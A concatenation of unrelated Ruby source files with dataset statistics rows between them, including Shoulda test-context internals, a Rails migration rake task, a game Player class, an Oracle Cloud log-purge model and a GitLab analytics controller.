# should validate_presence_of(:first_name).with_message(/gotta be there/)
#
def should(name_or_matcher, options = {}, &blk)
if Shoulda::Context.current_context
Shoulda::Context.current_context.should(name_or_matcher, options, &blk)
else
context_name = self.name.gsub(/Test/, "") if self.name
context = Shoulda::Context::Context.new(context_name, self) do
should(name_or_matcher, options, &blk)
end
context.build
end
end
# Allows negative tests using matchers. The matcher's description is used
# to generate a test name and negative failure message, and the test will
# pass unless the matcher matches the subject.
#
# === Example:
#
# should_not set_the_flash
def should_not(matcher)
if Shoulda::Context.current_context
Shoulda::Context.current_context.should_not(matcher)
else
context_name = self.name.gsub(/Test/, "") if self.name
context = Shoulda::Context::Context.new(context_name, self) do
should_not(matcher)
end
context.build
end
end
# == Before statements
#
# Before statements are should statements that run before the current
# context's setup. These are especially useful when setting expectations.
#
# === Example:
#
# class UserControllerTest < Test::Unit::TestCase
# context "the index action" do
# setup do
# @users = [Factory(:user)]
# User.stubs(:find).returns(@users)
# end
#
# context "on GET" do
# setup { get :index }
#
# should respond_with(:success)
#
# # runs before "get :index"
# before_should "find all users" do
# User.expects(:find).with(:all).returns(@users)
# end
# end
# end
# end
def before_should(name, &blk)
should(name, :before => blk) { assert true }
end
# Just like should, but never runs, and instead prints an 'X' in the Test::Unit output.
def should_eventually(name, options = {}, &blk)
context_name = self.name.gsub(/Test/, "")
context = Shoulda::Context::Context.new(context_name, self) do
should_eventually(name, &blk)
end
context.build
end
# == Contexts
#
# A context block groups should statements under a common set of setup/teardown methods.
# Context blocks can be arbitrarily nested, and can do wonders for improving the maintainability
# and readability of your test code.
#
# A context block can contain setup, should, should_eventually, and teardown blocks.
#
# class UserTest < Test::Unit::TestCase
# context "A User instance" do
# setup do
# @user = User.find(:first)
# end
#
# should "return its full name"
# assert_equal 'John Doe', @user.full_name
# end
# end
# end
#
# This code will produce the method <tt>"test: A User instance should return its full name. "</tt>.
#
# Contexts may be nested. Nested contexts run their setup blocks from out to in before each
# should statement. They then run their teardown blocks from in to out after each should statement.
#
# class UserTest < Test::Unit::TestCase
# context "A User instance" do
# setup do
# @user = User.find(:first)
# end
#
# should "return its full name"
# assert_equal 'John Doe', @user.full_name
# end
#
# context "with a profile" do
# setup do
# @user.profile = Profile.find(:first)
# end
#
# should "return true when sent :has_profile?"
# assert @user.has_profile?
# end
# end
# end
# end
#
# This code will produce the following methods
# * <tt>"test: A User instance should return its full name. "</tt>
# * <tt>"test: A User instance with a profile should return true when sent :has_profile?. "</tt>
#
# <b>Just like should statements, a context block can exist next to normal <tt>def test_the_old_way; end</tt>
# tests</b>. This means you do not have to fully commit to the context/should syntax in a test file.
def context(name, &blk)
if Shoulda::Context.current_context
Shoulda::Context.current_context.context(name, &blk)
else
context = Shoulda::Context::Context.new(name, self, &blk)
context.build
end
end
# Returns the class being tested, as determined by the test class name.
#
# class UserTest; described_type; end
# # => User
def described_type
@described_type ||= self.name.
gsub(/Test$/, '').
split('::').
inject(Object) { |parent, local_name| parent.const_get(local_name) }
end
# Sets the return value of the subject instance method:
#
# class UserTest < Test::Unit::TestCase
# subject { User.first }
#
# # uses the existing user
# should validate_uniqueness_of(:email)
# end
def subject(&block)
@subject_block = block
end
def subject_block # :nodoc:
@subject_block
end
end
module InstanceMethods
# Returns an instance of the class under test.
#
# class UserTest
# should "be a user" do
# assert_kind_of User, subject # passes
# end
# end
#
# The subject can be explicitly set using the subject class method:
#
# class UserTest
# subject { User.first }
# should "be an existing user" do
# assert !subject.new_record? # uses the first user
# end
# end
#
# The subject is used by all macros that require an instance of the class
# being tested.
def subject
@shoulda_subject ||= construct_subject
end
def subject_block # :nodoc:
(@shoulda_context && @shoulda_context.subject_block) || self.class.subject_block
end
def get_instance_of(object_or_klass) # :nodoc:
if object_or_klass.is_a?(Class)
object_or_klass.new
else
object_or_klass
end
end
def instance_variable_name_for(klass) # :nodoc:
klass.to_s.split('::').last.underscore
end
private
def construct_subject
if subject_block
instance_eval(&subject_block)
else
get_instance_of(self.class.described_type)
end
end
end
class Context # :nodoc:
attr_accessor :name # my name
attr_accessor :parent # may be another context, or the original test::unit class.
attr_accessor :subcontexts # array of contexts nested under myself
attr_accessor :setup_blocks # blocks given via setup methods
attr_accessor :teardown_blocks # blocks given via teardown methods
attr_accessor :shoulds # array of hashes representing the should statements
attr_accessor :should_eventuallys # array of hashes representing the should eventually statements
attr_accessor :subject_block
def initialize(name, parent, &blk)
Shoulda::Context.add_context(self)
self.name = name
self.parent = parent
self.setup_blocks = []
self.teardown_blocks = []
self.shoulds = []
self.should_eventuallys = []
self.subcontexts = []
if block_given?
merge_block(&blk)
else
merge_block { warn " * WARNING: Block missing for context '#{full_name}'" }
end
Shoulda::Context.remove_context
end
def merge_block(&blk)
blk.bind(self).call
end
def context(name, &blk)
self.subcontexts << Context.new(name, self, &blk)
end
def setup(&blk)
self.setup_blocks << blk
end
def teardown(&blk)
self.teardown_blocks << blk
end
def should(name_or_matcher, options = {}, &blk)
if name_or_matcher.respond_to?(:description) && name_or_matcher.respond_to?(:matches?)
name = name_or_matcher.description
blk = lambda { assert_accepts name_or_matcher, subject }
else
name = name_or_matcher
end
if blk
self.shoulds << { :name => name, :before => options[:before], :block => blk }
else
self.should_eventuallys << { :name => name }
end
end
def should_not(matcher)
name = matcher.description
blk = lambda { assert_rejects matcher, subject }
self.shoulds << { :name => "not #{name}", :block => blk }
end
def should_eventually(name, &blk)
self.should_eventuallys << { :name => name, :block => blk }
end
def subject(&block)
self.subject_block = block
end
def subject_block
return @subject_block if @subject_block
parent.subject_block
end
def full_name
parent_name = parent.full_name if am_subcontext?
return [parent_name, name].join(" ").strip
end
def am_subcontext?
parent.is_a?(self.class) # my parent is the same class as myself.
end
def test_unit_class
am_subcontext? ? parent.test_unit_class : parent
end
def test_methods
@test_methods ||= Hash.new { |h,k|
h[k] = Hash[k.instance_methods.map { |n| [n, true] }]
}
end
def create_test_from_should_hash(should)
test_name = ["test:", full_name, "should", "#{should[:name]}. "].flatten.join(' ').to_sym
if test_methods[test_unit_class][test_name.to_s] then
warn " * WARNING: '#{test_name}' is already defined"
end
test_methods[test_unit_class][test_name.to_s] = true
context = self
test_unit_class.send(:define_method, test_name) do
@shoulda_context = context
begin
context.run_parent_setup_blocks(self)
should[:before].bind(self).call if should[:before]
context.run_current_setup_blocks(self)
should[:block].bind(self).call
ensure
context.run_all_teardown_blocks(self)
end
end
end
def run_all_setup_blocks(binding)
run_parent_setup_blocks(binding)
run_current_setup_blocks(binding)
end
def run_parent_setup_blocks(binding)
self.parent.run_all_setup_blocks(binding) if am_subcontext?
end
def run_current_setup_blocks(binding)
setup_blocks.each do |setup_block|
setup_block.bind(binding).call
end
end
def run_all_teardown_blocks(binding)
teardown_blocks.reverse.each do |teardown_block|
teardown_block.bind(binding).call
end
self.parent.run_all_teardown_blocks(binding) if am_subcontext?
end
def print_should_eventuallys
should_eventuallys.each do |should|
test_name = [full_name, "should", "#{should[:name]}. "].flatten.join(' ')
puts " * DEFERRED: " + test_name
end
end
def build
shoulds.each do |should|
create_test_from_should_hash(should)
end
subcontexts.each { |context| context.build }
print_should_eventuallys
end
def method_missing(method, *args, &blk)
test_unit_class.send(method, *args, &blk)
end
end
end
end
| 31.090909 | 115 | 0.579874 |
bf0289f61547272d79ec881d74c1aba44a12ce21 | 490 | require File.join(Rails.root, "app", "data_migrations", "resolve_census_employee_validation_failures")
# This rake task is to remove the invalid benefit group assignments for the EE's
# format: RAILS_ENV=production bundle exec rake migrations:resolve_census_employee_validation_failures
namespace :migrations do
desc "correcting the invalid benefit group assignmentsr"
ResolveCensusEmployeeValidationFailures.define_task :resolve_census_employee_validation_failures => :environment
end
| 61.25 | 114 | 0.85102 |
61bdcaa416a6a81e3f6375389107b51ca7c04a38 | 2,160 | require_relative 'unit'
require_relative 'skills/skill'
Dir[File.dirname(__FILE__) + '/skills/*.rb'].each do |s|
require_relative 'skills/' + File.basename(s, '.rb')
end
# class Player
# ------------
# methods and stats unique to just the player unit
class Player < Unit
attr_accessor :energy, :energy_per_turn, :block, :block_per_turn, :active_skill, :skills, :skillset
STARTING_ENERGY = 5 # energy points at the start of each level
ENERGY_PER_TURN = 1 # energy points to gain at the start of each round
ALL_SKILLS = [
AimedArrow, DefensiveStance, DisciplinedStrike, Fortify, LuckyPunch,
PoisonArrow, Pierce, ShieldBash, ShieldWall, SpearThrow, Rejuvenation,
TastySnack, AxeThrow
]
STARTING_SKILLS = [Pierce, DefensiveStance] # skills which the player starts with
def initialize
super(symbol: '@', name: 'Player', style: 'player')
@ap = 1 # basic AP for the player when not using skills
refresh
@skills = STARTING_SKILLS
@skillset = @skills.map(&:new)
@active_skill = nil
end
def process_turn
super(nil, nil, nil)
@energy += @energy_per_turn
@block += @block_per_turn
end
def refresh
@energy = STARTING_ENERGY
@energy_per_turn = ENERGY_PER_TURN
@block = 0
@block_per_turn = 0
end
def use_skill_on_self
skill = @active_skill
return 'No skill selected!' unless skill
if skill.cost > @energy
"Not enough energy to use #{skill.name}."
else
@energy -= skill.cost
skill.effect(self)
end
end
def take_dmg(dmg)
@block -= dmg
if @block < 0
@hp += @block
@block = 0
end
end
def heal(amount)
@hp += amount
@hp = MAX_HP if @hp > MAX_HP
end
def add_random_skill(floor)
new_skills = ALL_SKILLS.select do |skill|
# check if skill is already in the player's possession
# and is appropriate for the current floor
@skills.none? { |s| s == skill } && skill.new.floors.cover?(floor)
end
if new_skills.size == 0 # check if there are any skills left to add
''
else
@skills << new_skills.sample
'You have found a new skill!'
end
end
end | 25.714286 | 101 | 0.658796 |
0123f03d421a48d659dff3b948adffbdef03bd2b | 10,082 | # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
require_relative 'action'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Purge action for scheduled task.
class LogAnalytics::Models::PurgeAction < LogAnalytics::Models::Action
DATA_TYPE_ENUM = [
DATA_TYPE_LOG = 'LOG'.freeze,
DATA_TYPE_LOOKUP = 'LOOKUP'.freeze,
DATA_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# **[Required]** Purge query string.
# @return [String]
attr_accessor :query_string
# **[Required]** the type of the log data to be purged
# @return [String]
attr_reader :data_type
# **[Required]** The duration of data to be retained, which is used to
# calculate the timeDataEnded when the task fires.
# The value should be negative.
# Purge duration in ISO 8601 extended format as described in
# https://en.wikipedia.org/wiki/ISO_8601#Durations.
# The largest supported unit is D, e.g. -P365D (not -P1Y) or -P14D (not -P2W).
#
# @return [String]
attr_accessor :purge_duration
# **[Required]** the compartment OCID under which the data will be purged
# @return [String]
attr_accessor :purge_compartment_id
# if true, purge child compartments data
# @return [BOOLEAN]
attr_accessor :compartment_id_in_subtree
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'type': :'type',
'query_string': :'queryString',
'data_type': :'dataType',
'purge_duration': :'purgeDuration',
'purge_compartment_id': :'purgeCompartmentId',
'compartment_id_in_subtree': :'compartmentIdInSubtree'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'type': :'String',
'query_string': :'String',
'data_type': :'String',
'purge_duration': :'String',
'purge_compartment_id': :'String',
'compartment_id_in_subtree': :'BOOLEAN'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :query_string The value to assign to the {#query_string} property
# @option attributes [String] :data_type The value to assign to the {#data_type} property
# @option attributes [String] :purge_duration The value to assign to the {#purge_duration} property
# @option attributes [String] :purge_compartment_id The value to assign to the {#purge_compartment_id} property
# @option attributes [BOOLEAN] :compartment_id_in_subtree The value to assign to the {#compartment_id_in_subtree} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
attributes['type'] = 'PURGE'
super(attributes)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.query_string = attributes[:'queryString'] if attributes[:'queryString']
raise 'You cannot provide both :queryString and :query_string' if attributes.key?(:'queryString') && attributes.key?(:'query_string')
self.query_string = attributes[:'query_string'] if attributes[:'query_string']
self.data_type = attributes[:'dataType'] if attributes[:'dataType']
raise 'You cannot provide both :dataType and :data_type' if attributes.key?(:'dataType') && attributes.key?(:'data_type')
self.data_type = attributes[:'data_type'] if attributes[:'data_type']
self.purge_duration = attributes[:'purgeDuration'] if attributes[:'purgeDuration']
raise 'You cannot provide both :purgeDuration and :purge_duration' if attributes.key?(:'purgeDuration') && attributes.key?(:'purge_duration')
self.purge_duration = attributes[:'purge_duration'] if attributes[:'purge_duration']
self.purge_compartment_id = attributes[:'purgeCompartmentId'] if attributes[:'purgeCompartmentId']
raise 'You cannot provide both :purgeCompartmentId and :purge_compartment_id' if attributes.key?(:'purgeCompartmentId') && attributes.key?(:'purge_compartment_id')
self.purge_compartment_id = attributes[:'purge_compartment_id'] if attributes[:'purge_compartment_id']
self.compartment_id_in_subtree = attributes[:'compartmentIdInSubtree'] unless attributes[:'compartmentIdInSubtree'].nil?
self.compartment_id_in_subtree = false if compartment_id_in_subtree.nil? && !attributes.key?(:'compartmentIdInSubtree') # rubocop:disable Style/StringLiterals
raise 'You cannot provide both :compartmentIdInSubtree and :compartment_id_in_subtree' if attributes.key?(:'compartmentIdInSubtree') && attributes.key?(:'compartment_id_in_subtree')
self.compartment_id_in_subtree = attributes[:'compartment_id_in_subtree'] unless attributes[:'compartment_id_in_subtree'].nil?
self.compartment_id_in_subtree = false if compartment_id_in_subtree.nil? && !attributes.key?(:'compartmentIdInSubtree') && !attributes.key?(:'compartment_id_in_subtree') # rubocop:disable Style/StringLiterals
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] data_type Object to be assigned
def data_type=(data_type)
# rubocop:disable Style/ConditionalAssignment
if data_type && !DATA_TYPE_ENUM.include?(data_type)
OCI.logger.debug("Unknown value for 'data_type' [" + data_type + "]. Mapping to 'DATA_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@data_type = DATA_TYPE_UNKNOWN_ENUM_VALUE
else
@data_type = data_type
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
type == other.type &&
query_string == other.query_string &&
data_type == other.data_type &&
purge_duration == other.purge_duration &&
purge_compartment_id == other.purge_compartment_id &&
compartment_id_in_subtree == other.compartment_id_in_subtree
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[type, query_string, data_type, purge_duration, purge_compartment_id, compartment_id_in_subtree].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 40.817814 | 245 | 0.694207 |
e8d0dd3dec470a5e43d042874bca1fcda8356593 | 1,518 | # frozen_string_literal: true
class Groups::ContributionAnalyticsController < Groups::ApplicationController
include Analytics::UniqueVisitsHelper
before_action :group
before_action :check_contribution_analytics_available!
before_action :authorize_read_contribution_analytics!
layout 'group'
track_unique_visits :show, target_id: 'g_analytics_contribution'
feature_category :planning_analytics
def show
@start_date = data_collector.from
respond_to do |format|
format.html
format.json do
render json: GroupAnalyticsSerializer
.new(data_collector: data_collector)
.represent(data_collector.users), status: :ok
end
end
end
private
def data_collector
@data_collector ||= Gitlab::ContributionAnalytics::DataCollector
.new(group: @group, from: params[:start_date] || 1.week.ago.to_date)
end
def check_contribution_analytics_available!
return if group_has_access_to_feature?
show_promotions? ? render_promotion : render_404
end
def authorize_read_contribution_analytics!
render_403 unless user_has_access_to_feature?
end
def render_promotion
render 'shared/promotions/_promote_contribution_analytics'
end
def show_promotions?
LicenseHelper.show_promotions?(current_user)
end
def group_has_access_to_feature?
@group.feature_available?(:contribution_analytics)
end
def user_has_access_to_feature?
can?(current_user, :read_group_contribution_analytics, @group)
end
end
| 24.483871 | 77 | 0.769433 |
7975a4455f3dae0e70c703f7feb8b2a382f40a0e | 175 | require File.dirname(__FILE__) + '/../test_helper'
class HostTest < ActiveSupport::TestCase
# Replace this with your real tests.
def test_truth
assert true
end
end
| 19.444444 | 50 | 0.731429 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.